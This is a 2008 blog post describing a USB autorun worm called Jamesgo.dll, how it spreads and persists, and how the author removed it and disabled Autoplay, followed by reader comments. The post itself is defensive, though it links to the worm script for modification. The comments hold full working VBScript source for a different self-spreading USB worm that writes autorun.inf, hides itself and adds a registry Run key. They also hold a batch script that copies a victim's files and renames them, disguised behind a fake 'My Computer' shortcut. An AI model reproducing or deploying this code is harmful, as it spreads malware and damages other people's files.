USB Worm (Jamesgo.dll)
January 9th, 2008 by 
Patchy
The other day my computer was infected by a USB Worm known as Jamesgo.dll. I received the virus when I inserted my girlfriend’s USB thumb drive. The worm modified the autorun.inf file on the thumb drive, so it was able to automatically transfer itself to all my hard disk drives (Click Here to view autorun.inf). There is little information on the internet about this virus, so I had to figure out my own way to remove it. By analyzing the autorun.inf (which the virus cleverly changed to a system hidden file, and later I found out that it modified the registry so system hidden files are never displayed) I disclovered that each drive contains the Visual Basic Script, test.vbs (Click Here to view Test.vbs). Basically what the file does is copies test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. Also, it runs every 60 seconds, so if you delete it from one drive in 60 seconds it will recopy itself from a different drive. Futhermore, the test.reg simply edits the registry so test.bat runs on start up and prevents system hidden files from being displayed. Test.bat runs the VB script and changes the files to system,hidden,achieved, and read-only (Click Here to view Test.reg and Click Here to view Test.bat). To remove the virus I crafted a batch file changes all the test files and autorun to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*), and then deleted them. Since the batch file can delete all the files quickly it does not have a chance to recopy itself to all the disk drives. Also, I manually removed all entires of test.bat from the registry (Click Here to view Fix)
To prevent a USB Worm from infecting your computer:
1) Goto Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”
In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example on how easy it is to create a Worm for travels though removal media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and Batch files to create a “Auto Hacking USB Thumb Drive” go here.
Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.
To prevent a USB Worm from infecting your computer:
1) Goto Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”
In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example on how easy it is to create a Worm for travels though removal media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and Batch files to create a “Auto Hacking USB Thumb Drive” go here.
Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.
Posted in News | 
24 Responses
You must be logged in to leave a comment.
January 9th, 2008 at 3:37 pm
I had the same problem 6 months ago. It was the same kind of worm with same functionallity but with one extra feature, to add an IFRAME to all php, html, htm files. It was a pain in the butt to “disinfect” all those files.
January 9th, 2008 at 8:54 pm
Wow that is interesting, you could do alot with this method with the majority of people not knowing so much about computers. Maybe make it a back door something, wonder why they had it copy every 60 sec instead of instantly after one file was deleted? Either way good job on the breakdown.
January 10th, 2008 at 4:47 am
Can someone please, giveme thelink ornameofthe program using in the 7 episode phone phreaking/network hacking……………PLEASE!!!!!
January 10th, 2008 at 4:48 am
please fastresponse
January 10th, 2008 at 10:25 am
Hi ya! it is called Cain + Abel, Great Site Nox and Patchy greetings from Ecuador South America
January 10th, 2008 at 3:33 pm
thx bitfrost, i got voip on my router and i want to try that hack….
January 11th, 2008 at 7:35 am
nox, pathcy and others please help!!! i got the program cain and abel(cain+abel) and when i going to add a host i am trying to click and on …subnet… and on option to you wrotefrom: to: but my gateway is 192.168.1.254 and cain and abel cant recognise it because biggest adress is 192.168.1.254 please some help…..
January 11th, 2008 at 6:41 pm
Hacker2479, you should try posting on the forums, more people read them, and it is a great place to ask questions.
January 12th, 2008 at 6:58 am
alright, thanks for advice
January 13th, 2008 at 7:25 am
i cant believe that worm got there…its from the phils and i live in phils too.. some filipinos do know how to make some “crap” heheh… nice fix..
P.S.
do u any compact BACKTRACK?? pls post..tanks,
February 3rd, 2008 at 6:37 am
the creator of this crap is trying to be Onel de Guzman, a filipino who created the most destructive computer virus in history, the lovebug.
February 5th, 2008 at 8:48 pm
i just followed your instructions on how to remove jamesgo.dll. Everything seems to have worked but still, whenever I click C:/ it opens a search result window. How do I repair this? thanks
February 11th, 2008 at 4:35 am
Hi, I just recently caught the virus. I’ve checked other sites and all they tell me is delete autorun, and test.bat,reg etc. But it always comes back! Can you teach how to delete it? It really is annoying. >_
March 2nd, 2008 at 6:16 pm
hope you know how to remove the vrus from the source media tself c0z it would keep on c0ming back for as loNg as your usng it…
March 2nd, 2008 at 6:18 pm
for the Filipino who created such viRus, makarma ka sna! wla kang kwenta… matalno ka sNa pRo wLa nMang pknabang! (”,)
March 2nd, 2008 at 10:05 pm
hay try this. if you have a floppy drive boot off a rescue disk in dos manually remove the virus. of course at c:\ you type attrib -r -s -h test.* then del test.* same for autorun.* and same at windows\system32 GOODLUCK..Mike
March 3rd, 2008 at 9:40 pm
please help me..i also got the virus..sadly my brother transfered it to my mobile phone..please help..how can i remove it
March 10th, 2008 at 6:25 am
hay friends i am new on your web
please guide me that how can i become i hacker
my mail is blackshadowbutt@yahoo.com
May 5th, 2008 at 6:33 am
I received this when I went to Puerto Rico and shared some USB keys to transfer some different programs. We successfully removed it, but noticed that Semantec identified the risk and quarantined the file on some computers, but not on others.
Reminder to update your virus definitions!
June 21st, 2008 at 6:08 am
usb firewall is also a good solution and it also notify you and delete the worm from the pendrive http://net-studio.org/application/usb_firewall.php and its free
July 8th, 2008 at 3:48 am
plz post a code
July 8th, 2008 at 4:00 am
‘W32/SJITBULOK
‘By:TROJANZ@SJIT
‘July 07,08
‘Subject - PAG PANIMALOS
‘Animal Gi INC ko tol!!!!!!
On Error Resume Next
Dim mysource, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe SJIT-BULOK.bat.vbs”
Set fs = CreateObject(”Scripting.FileSystemObject”)
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size
size = mf.size
check = mf.Drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
mysource=mysource&text.readline
mysource = mysource & vbCrLf
Loop
Do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 32
Set tf = fs.createtextfile(winpath & “\SJIT-BULOK.bat.vbs”, 2, True)
tf.write mysource
tf.Close
Set tf = fs.getfile(winpath & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path “A:” Then
Set tf = fs.getfile(flashdrive.Path & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & “\SJIT-BULOK.bat.vbs”, 2, True)
tf.write mysource
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & “\autorun.inf”, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 39
End If
Next
Set rg = CreateObject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\screws”, “C:\SJIT-BULOK.bat.vbs”, “REG_SZ”
If check 1 Then
Wscript.Sleep 20000
End If
Loop While check 1
Set sd = CreateObject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
July 8th, 2008 at 4:16 am
hacking friends usb @ your school
@echo off
cls
mkdir c:\Bonlax181
cd\
rem pag ang drive is D use D
d:
copy *.exe c:\Bonlax181
copy *.mp3 c:\Bonlax181
copy *.wmv c:\Bonlax181
copy *.doc c:\Bonlax181
Ren *.exe *.txt
Ren *.mp3 *.txt
Ren *.wmv *.txt
Ren *.doc *.txt
Echo”GAGO KA!NA HACK NA FILE U” >> d:\PLZ CLICK.HTML
exit
after save this MyComputer.bat
to Desktop
then make a shortcut of this then change the shortcut file my compute icon and the oreginal hide it..para hindi makita o ma delete..
pag programer ka alam mo na ibig ko sabihin…hehehehe
September 15th, 2008 at 1:18 am
MAN UR THE MAN! VIVA LA KEYBOARD MASTERS